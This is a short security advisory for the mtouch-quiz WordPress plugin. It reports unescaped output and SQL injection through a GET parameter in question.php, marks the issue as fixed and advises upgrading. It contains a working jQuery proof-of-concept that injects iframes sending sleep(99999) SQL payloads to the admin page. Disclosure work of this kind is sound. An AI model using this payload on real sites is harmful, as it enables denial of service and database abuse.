CVSS Summary
| Score | 9 High |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | Complete |
| Integrity | Partial |
| Availability | Complete |
Last revised:
There are two unescaped outputtings of a GET parameter and one unescaped SQL query using the same GET parameter in question.php (lines 87, 94, and 117, respectively).
Current state: Fixed
| Score | 9 High |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | Complete |
| Integrity | Partial |
| Availability | Complete |
jQuery(function ($) {
for (var i = 0; i <= 20; i++) {
$('body').append('<iframe src="/wp-admin/edit.php?page=mtouch-quiz/question.php&quiz=sleep(99999)&a='+i+'"></iframe>')
}
})
Upgrade immediately.